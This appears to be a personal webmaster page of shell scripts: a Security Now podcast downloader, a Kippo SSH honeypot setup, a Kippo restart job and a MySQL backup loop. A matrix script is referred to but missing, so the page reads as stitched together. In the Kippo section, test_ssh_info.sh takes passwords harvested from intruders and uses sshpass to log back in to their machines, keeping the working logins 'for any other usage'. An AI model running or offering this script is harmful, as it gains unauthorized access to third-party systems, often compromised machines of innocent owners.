This script is a work by Webmaster Seth Leedy, but was inspired by and evolved from the scripts by [email protected]
I noticed that I was mentioned on the Security Now show (episodes 457 and 558). Yippee!
Download any or all of Steve Gibson’s GRC Security Now podcasts via a bash script.
The script can look at the episodes already downloaded and download the next one.
You can specify the episode(s): download one or a range.
Another function searches for text within ALL the episodes and copies the matching episode transcripts to another directory for further reading.
Run it with “-h” for all the other options.
The code is now on GitHub! Feel free to help develop it or fork it.
You can submit issues on GitHub or via email to me. Comments below are not actively monitored…
Command line examples:
- Will download the latest episode as the TEXT transcription.
- ./GRC-Downloader.sh -eptxt -latest
- Will download the latest episode as the PDF transcription.
- ./GRC-Downloader.sh -eppdf -latest
- This will download both the TEXT and the PDF.
- ./GRC-Downloader.sh -eppdf -eptxt -latest
- The arguments -ahq and -alq are for downloading AUDIO .MP3 files.
- -AHQ = High Quality. -ALQ = Low Quality.
- The arguments -vhq and -vlq are for downloading VIDEO .MP4 files.
- -VHQ = High Quality. -VLQ = Low Quality.
- ./GRC-Downloader.sh -alq -vlq -eptxt -latest
- ./GRC-Downloader.sh -vlq -eptxt -ep 10
- You can also download all video (in HD) and text at once, 10 downloads at a time. *Not all episodes are in HD; the start of the show was not in video at all, let alone HD.
- ./GRC-Downloader.sh -vhd -eptxt -ep 1:latest -pd 10
- Will download every single text copy of the episodes, search them for your text (TNO here), and put the results in a special directory for you to open at your leisure.
- ./GRC-Downloader.sh -dandstxt TNO
- Will search only the text episodes already downloaded in the current directory and the cache used by the -dandstxt option above. It will not go online to search.
- ./GRC-Downloader.sh -stxt TNO
- Create an RSS feed file from the shows!
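As an illustration only of that feed idea (this is not the script's actual behaviour): a minimal sketch that builds an RSS 2.0 file from transcript files already sitting in the current directory. The sn-*.txt file-name pattern, the feed layout, and the item links are assumptions.

```shell
# Minimal sketch: wrap local transcript files in an RSS 2.0 skeleton.
# The sn-*.txt naming and the grc.com links are assumptions.
feed=grc_feed.xml
{
    echo '<?xml version="1.0" encoding="UTF-8"?>'
    echo '<rss version="2.0"><channel>'
    echo '<title>Security Now episodes</title>'
    for f in sn-*.txt; do
        [ -e "$f" ] || continue   # no matches: skip the unexpanded glob
        echo "<item><title>${f%.txt}</title><link>https://www.grc.com/sn/$f</link></item>"
    done
    echo '</channel></rss>'
} > "$feed"
```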
The paths need to be adjusted to match your setup.
There are two places to change. Number one is the matrix.sh file; you will see it below.
Number two is the very first part of the matrix_char.sh file.
This could be expanded upon. Have fun and submit your changes back.
First we log all the connection attempts to my server (live or a new virtual machine) using the package called Kippo – http://code.google.com/p/kippo/.
Then we create this file, which I called grab_ssh_info.sh (click for the latest version).
# Run this at least once a day in order to get all the entries.
# Run it before logrotate does its work on the Kippo log (you are rotating it, right?) for the day/week/month.
# Cron could run it at the 44-minute mark every hour, so when the log rotates at midnight you will not lose much data.
# Start a new log if we do not have one yet.
if [ ! -e /root/scripts/kippo_ssh_auths.log ]; then
	touch /root/scripts/kippo_ssh_auths.log
fi
# Since I am only looking at the recent listings, only look at today's
# entries based on the date timestamp, and loop over each matching line.
todays_date=$(date +%Y-%m-%d)
grep -i "$todays_date" /home/ris/kippo-0.5/log/kippo.log | while read -r line; do
	# Only handle the lines that contain login auths and IPs. All in one line in this case.
	if echo "$line" | grep -q -i "login attempt"; then
		# Cut out the different parts.
		inIP=$(echo "$line" | cut -d '[' -f 2 | cut -d ',' -f 3 | cut -d ']' -f 1)
		inUSER=$(echo "$line" | cut -d '[' -f 3 | cut -d '/' -f 1)
		inPASS=$(echo "$line" | cut -d '[' -f 3 | cut -d '/' -f 2 | cut -d ']' -f 1)
		# Throw it all in together for outputting to a log of my own.
		output="$inIP|$inUSER|$inPASS"
		# If we do not already have it in the log, append the info to it.
		if ! grep -q "$output" /root/scripts/kippo_ssh_auths.log; then
			echo "$output" >> /root/scripts/kippo_ssh_auths.log
		fi
	fi
done
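To see what those cut chains actually extract, here they are applied to a single sample line. The log line below is a hypothetical example in the shape of a Kippo 0.5 "login attempt" entry, not output copied from a real log.

```shell
# Hypothetical sample line in the shape of a Kippo "login attempt" entry.
line='2014-05-27 10:44:01+0200 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.5] login attempt [root/123456] failed'
inIP=$(echo "$line" | cut -d '[' -f 2 | cut -d ',' -f 3 | cut -d ']' -f 1)
inUSER=$(echo "$line" | cut -d '[' -f 3 | cut -d '/' -f 1)
inPASS=$(echo "$line" | cut -d '[' -f 3 | cut -d '/' -f 2 | cut -d ']' -f 1)
echo "$inIP|$inUSER|$inPASS"    # prints 203.0.113.5|root|123456
```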
Then we can use the copy of the /root/scripts/kippo_ssh_auths.log log to try to connect BACK to the door-knocker’s machine and see if the login works.
If it does, add it to a success log (if new) and go on to the next one.
If it fails, ignore it; it will be deleted when we delete the copy of the log file at the end of the script.
I call this file test_ssh_info.sh.
# This script will mv the /root/scripts/kippo_ssh_auths.log log to /root/scripts/test_ssh_auths.log
# so we can safely work on it.
# After moving, it will go line by line, take the fields, and test them over ssh.
# If one works, the info will be written to another log, /root/scripts/valid_ssh_auths.log, for any other usage.
# Suggested to run at the 45-minute mark every hour, right after the grab-info script.
mv /root/scripts/kippo_ssh_auths.log /root/scripts/test_ssh_auths.log
# Save the old string separator, then set the one we want.
OLDIFS=$IFS
IFS='|'
while read -r line; do
	echo "Testing: $line"
	# Split the line into its parts. Format: IP|USERNAME|PASSWORD
	read -r testip testuser testpass <<< "$line"
	# echo "$testip $testuser $testpass"
	# Use the tool sshpass to pass a password through to ssh.
	# How can I do this in parallel ?
	sshpass -p "$testpass" ssh -q -o "StrictHostKeyChecking no" -l "$testuser" "$testip" "exit"
	testssh=$?
	# echo "Return Code: $testssh"
	# sshpass will exit with code 0 if it logged in OK.
	# ?? I was testing it and had some errors using the script. It would exit with 5. If I did it manually, it worked.
	if [ $testssh -eq 0 ]; then
		if [ ! -e /root/scripts/valid_ssh_auths.log ]; then
			touch /root/scripts/valid_ssh_auths.log
		fi
		# Only append if we do not already have it.
		if ! grep -q "$line" /root/scripts/valid_ssh_auths.log; then
			echo "$line" >> /root/scripts/valid_ssh_auths.log
		fi
		echo "Valid: $line"
	else
		echo "NOT Valid: $line"
	fi
done < /root/scripts/test_ssh_auths.log
# Change back the string separator.
IFS=$OLDIFS
# Remove the log that we tested.
rm /root/scripts/test_ssh_auths.log
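On the "how can I do this in parallel?" question in the script above: one approach is xargs -P, which fans each log line out to a pool of workers. In this sketch, try_login is a hypothetical wrapper; the real sshpass call is left commented out and replaced by an echo, so the sketch runs without contacting any host.

```shell
# Fan out up to 4 tests at once with xargs -P. try_login is a hypothetical
# wrapper around the sshpass call; it only echoes here so the sketch is
# safe to run without network access.
try_login() {
    IFS='|' read -r testip testuser testpass <<< "$1"
    # sshpass -p "$testpass" ssh -q -o "StrictHostKeyChecking no" -l "$testuser" "$testip" "exit"
    echo "would test $testuser@$testip"
}
export -f try_login
printf '%s\n' '203.0.113.5|root|123456' '203.0.113.9|admin|admin' \
    | xargs -P 4 -I{} bash -c 'try_login "$1"' _ {}
```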
A small script (start_kippo.sh) for cron to make sure your Kippo is still running.
I noticed that the small VPS I was running would kill Kippo once in a while because it ran out of memory (32 MB) and swap (32 MB). So I test every minute to see if it needs starting again.
ps aux | grep -i twistd | grep -v grep | grep -q -i kippo
code=$?
if [ $code -eq 1 ]; then
	sudo -u ris /home/ris/kippo-0.5/start.sh
	echo "Started Kippo again."
fi
Set your log rotation to cycle the Kippo log every 24 hours or my scripts will be re-testing a lot of ssh connections.
Set your cron to run them whenever you like; I recommend just before the logrotate cycle. Just make sure the sequence is right: run the grab script first.
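As a concrete example, the schedule described above could look like this in root’s crontab. The :44/:45 times follow the comments in the scripts; adjust to taste.

```
# m  h  dom mon dow  command
44   *  *   *   *    /root/scripts/grab_ssh_info.sh
45   *  *   *   *    /root/scripts/test_ssh_info.sh
*    *  *   *   *    /root/scripts/start_kippo.sh
```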
Backup all mysql databases to separate dump files
It’s easy to simply do a
mysqldump --all-databases > mysqlbackup.sql
to back up everything into one large SQL dump, so that you have the inserts there if something goes wrong. But what a nightmare you face when you just have to get those lines that affect your recently crashed site! Well, there’s a slightly more sophisticated, but much better, solution: have each of your databases backed up in a separate SQL dump file with the following shell script:
for i in /var/lib/mysql/*/; do
	dbname=$(basename "$i")
	/usr/bin/mysqldump "$dbname" > /home/db_backups/"$dbname".sql
done
Of course you might have to add login parameters to the mysqldump line above, but that shouldn’t be a problem. (Hint: -u myusername --password=mysecretpassword)
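If you run this daily, date-stamping the dump names keeps older copies from being overwritten. A small sketch reusing the placeholder credentials from the hint above; build_dump_cmd is a hypothetical helper that only prints the command it would run, so nothing here touches a real database.

```shell
# Sketch: per-database dump command with credentials and a date stamp.
# Credentials and paths are placeholders; the helper only echoes the command.
backup_dir=/home/db_backups
stamp=$(date +%F)
build_dump_cmd() {
    dbname=$(basename "$1")
    echo "/usr/bin/mysqldump -u myusername --password=mysecretpassword $dbname > $backup_dir/$dbname-$stamp.sql"
}
build_dump_cmd /var/lib/mysql/wordpress/
```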